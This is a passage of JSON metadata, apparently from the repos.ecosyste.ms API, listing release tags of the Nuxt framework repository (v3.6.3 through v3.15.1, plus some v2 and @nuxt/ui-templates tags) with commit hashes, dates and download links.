tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/a